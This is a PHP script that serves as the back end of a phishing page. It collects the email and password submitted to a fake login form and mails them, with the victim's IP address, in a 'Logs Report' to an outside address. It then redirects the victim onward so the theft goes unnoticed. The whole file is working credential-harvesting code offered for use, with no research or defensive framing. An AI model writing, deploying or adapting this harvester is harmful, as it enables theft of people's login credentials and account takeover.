<?php
// Configuration
$recipient_email = "admin@newool.online"; // Replace with your email address
$redirect_success = "next.php"; // Redirect here if email and password are set
$redirect_failure = "index.html"; // Redirect back to the form if email or password is missing

// Function to get the user's IP address
function getUserIP() {
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        return $_SERVER['HTTP_CLIENT_IP'];
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        return $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
        return $_SERVER['REMOTE_ADDR'];
    }
}

// Retrieve form data
$email = isset($_POST['email']) ? trim($_POST['email']) : null;
$password = isset($_POST['password']) ? trim($_POST['password']) : null;

// Check if email and password are provided
if (!empty($email) && !empty($password)) {
    $ip_address = getUserIP();

    // Prepare email content in HTML format
    $subject = "Logs Report";
    $message = "
    <html>
    <head>
        <title>Logs Report</title>
        <style>
            table {
                width: 100%;
                border-collapse: collapse;
                font-family: Arial, sans-serif;
            }
            th, td {
                border: 1px solid #ddd;
                padding: 8px;
                text-align: left;
            }
            th {
                background-color: #007bff;
                color: white;
            }
        </style>
    </head>
    <body>
        <h2>Logs Report</h2>
        <table>
            <tr>
                <th></th>
                <th></th>
            </tr>
            <tr>
                <td>Username</td>
                <td>{$email}</td>
            </tr>
            <tr>
                <td>Password</td>
                <td>{$password}</td>
            </tr>
            <tr>
                <td>IP Address</td>
                <td>{$ip_address}</td>
            </tr>
        </table>
    </body>
    </html>
    ";

    // Headers for HTML email
    $headers = "MIME-Version: 1.0" . "\r\n";
    $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
    $headers .= "From: Support@newool.onine" . "\r\n"; // Replace with your domain or sender email

    // Send the email
    mail($recipient_email, $subject, $message, $headers);

    // Redirect to success page
    header("Location: $redirect_success");
    exit();
} else {
    // Redirect back to the form
    header("Location: $redirect_failure");
    exit();
}
?>
